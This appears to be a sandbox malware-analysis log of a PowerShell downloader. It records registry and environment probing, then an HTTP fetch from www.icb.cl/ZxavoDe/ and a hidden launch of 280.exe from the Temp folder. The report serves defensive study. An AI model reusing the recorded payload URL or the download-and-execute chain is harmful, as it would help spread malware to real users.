Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ODiag - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ODiag\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OSession - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OSession\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ODiag - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OSession - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ODiag - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OSession - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ODiag - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OSession - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance - True 1
Fn
Open Key HKEY_CURRENT_USER - True 1
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 4
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 3
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 3
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 6
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 6
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = Client, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = netfxperf.dll, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = Counter Names, type = REG_BINARY True 2
Fn
Data
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Process (2)
»
Operation Process Additional Information Success Count Logfile
Create C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe show_window = SW_SHOWNORMAL True 1
Fn
Get Info - type = PROCESS_BASIC_INFORMATION True 1
Fn
Module (5)
»
Operation Module Additional Information Success Count Logfile
Get Filename - process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowersHell.exe, size = 2048 True 1
Fn
Get Filename - process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowersHell.exe, size = 260 True 2
Fn
Create Mapping - filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 True 1
Fn
Map - process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, desired_access = FILE_MAP_WRITE True 1
Fn
User (1)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
System (9)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = XABNCPUWKW True 1
Fn
Get Info type = Operating System True 6
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Get Info type = Hardware Information True 1
Fn
Mutex (33)
»
Operation Additional Information Success Count Logfile
Create mutex_name = Global\.net clr networking True 10
Fn
Create mutex_name = Global\.net clr networking False 1
Fn
Create mutex_name = Global\.net clr networking True 5
Fn
Open mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE True 1
Fn
Release mutex_name = Global\.net clr networking True 1
Fn
Release mutex_name = Global\.net clr networking True 10
Fn
Release mutex_name = Global\.net clr networking True 5
Fn
Environment (109)
»
Operation Additional Information Success Count Logfile
Get Environment String name = MshEnableTrace False 99
Fn
Get Environment String name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Get Environment String name = HOMEDRIVE, result_out = C: True 1
Fn
Get Environment String name = HOMEPATH, result_out = \Users\kFT6uTQW True 1
Fn
Get Environment String name = HomeDrive, result_out = C: True 1
Fn
Get Environment String name = HomePath, result_out = \Users\kFT6uTQW True 1
Fn
Get Environment String name = COmSpeC, result_out = C:\Windows\system32\cmd.exe True 2
Fn
Get Environment String name = temp, result_out = C:\Users\kFT6uTQW\AppData\Local\Temp True 2
Fn
Set Environment String name = PSMODULEPATH, value = C:\Users\kFT6uTQW\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Network Behavior
DNS (2)
»
Operation Additional Information Success Count Logfile
Resolve Name host = comprealm.net, address_out = 184.168.46.18 True 1
Fn
Resolve Name host = www.icb.cl, address_out = 190.196.2.210 True 1
Fn
HTTP Sessions (1)
»
Information Value
Total Data Sent 68 bytes
Total Data Received 104.34 KB
Contacted Host Count 1
Contacted Hosts www.icb.cl
HTTP Session #1
»
Information Value
Server Name www.icb.cl
Server Port 80
Data Sent 68
Data Received 106844
Operation Additional Information Success Count Logfile
Open Session access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Fn
Open Connection protocol = http, server_name = www.icb.cl, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /ZxavoDe/ True 1
Fn
Send HTTP Request headers = host: www.icb.cl, connection: Keep-Alive, url = www.icb.cl/ZxavoDe/ True 1
Fn
Data
Read Response size = 4096, size_out = 4096 True 1
Fn
Data
Read Response size = 65536, size_out = 4616 True 1
Fn
Data
Read Response size = 65536, size_out = 1452 True 1
Fn
Data
Read Response size = 65536, size_out = 7260 True 1
Fn
Data
Read Response size = 65536, size_out = 2904 True 1
Fn
Data
Read Response size = 65536, size_out = 1452 True 1
Fn
Data
Read Response size = 65536, size_out = 7260 True 1
Fn
Data
Read Response size = 65536, size_out = 5808 True 1
Fn
Data
Read Response size = 65536, size_out = 1452 True 3
Fn
Data
Read Response size = 65536, size_out = 2904 True 1
Fn
Data
Read Response size = 64736, size_out = 2904 True 1
Fn
Data
Read Response size = 61832, size_out = 23608 True 1
Fn
Data
Read Response size = 38224, size_out = 2920 True 1
Fn
Data
Read Response size = 35304, size_out = 2920 True 1
Fn
Data
Read Response size = 32384, size_out = 2920 True 1
Fn
Data
Read Response size = 29464, size_out = 1452 True 1
Fn
Data
Read Response size = 28012, size_out = 1468 True 1
Fn
Data
Read Response size = 26544, size_out = 1452 True 1
Fn
Data
Read Response size = 25092, size_out = 1468 True 1
Fn
Data
Read Response size = 23624, size_out = 7292 True 1
Fn
Data
Read Response size = 16332, size_out = 1468 True 1
Fn
Data
Read Response size = 14864, size_out = 7292 True 1
Fn
Data
Read Response size = 7572, size_out = 5840 True 1
Fn
Data
Read Response size = 1732, size_out = 1468 True 1
Fn
Data
Read Response size = 264, size_out = 264 True 1
Fn
Data
Close Session - True 1
Fn
Process #3: 280.exe
348 0
»
Information Value
ID #3
File Name c:\users\kft6utqw\appdata\local\temp\280.exe
Command Line "C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:02:15, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:02:53
OS Process Information
»
Information Value
PID 0xb40
Parent PID 0xa08 (c:\windows\syswow64\windowspowershell\v1.0\powershell.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B44
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
private_0x00000000001a0000 0x001a0000 0x001affff Private Memory Readable, Writable True False False -
private_0x00000000001b0000 0x001b0000 0x001bcfff Private Memory Readable, Writable, Executable True False False -
private_0x00000000001c0000 0x001c0000 0x001ccfff Private Memory Readable, Writable True False False -
private_0x00000000001d0000 0x001d0000 0x001dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000001d0000 0x001d0000 0x001d7fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000001e0000 0x001e0000 0x0025ffff Private Memory Readable, Writable True False False -
private_0x0000000000260000 0x00260000 0x0027ffff Private Memory Readable, Writable, Executable True False False -
pagefile_0x0000000000280000 0x00280000 0x00287fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000002a0000 0x002a0000 0x0039ffff Private Memory Readable, Writable True False False -
280.exe 0x00400000 0x0041afff Memory Mapped File Readable, Writable, Executable True True False
locale.nls 0x00420000 0x00486fff Memory Mapped File Readable False False False -
private_0x0000000000540000 0x00540000 0x0054ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000550000 0x00550000 0x006d7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000006e0000 0x006e0000 0x00860fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000870000 0x00870000 0x01c6ffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01c70000 0x01f3efff Memory Mapped File Readable False False False -
rasman.dll 0x6c9a0000 0x6c9b4fff Memory Mapped File Readable, Writable, Executable False False False -
rasapi32.dll 0x74d60000 0x74db1fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x75af0000 0x75b24fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x76260000 0x7637cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x76470000 0x7647bfff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x77bb0000 0x77bb5fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Host Behavior
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe os_pid = 0xb50, creation_flags = CREATE_HIGH_PRIORITY_CLASS, show_window = SW_HIDE True 1
Fn
Module (19)
»
Operation Module Additional Information Success Count Logfile
Load USER32.dll base_address = 0x771c0000 True 1
Fn
Load KERNEL32.dll base_address = 0x75fb0000 True 1
Fn
Get Filename - process_name = c:\users\kft6utqw\appdata\local\temp\280.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 260 True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x18fc4c True 1
Fn
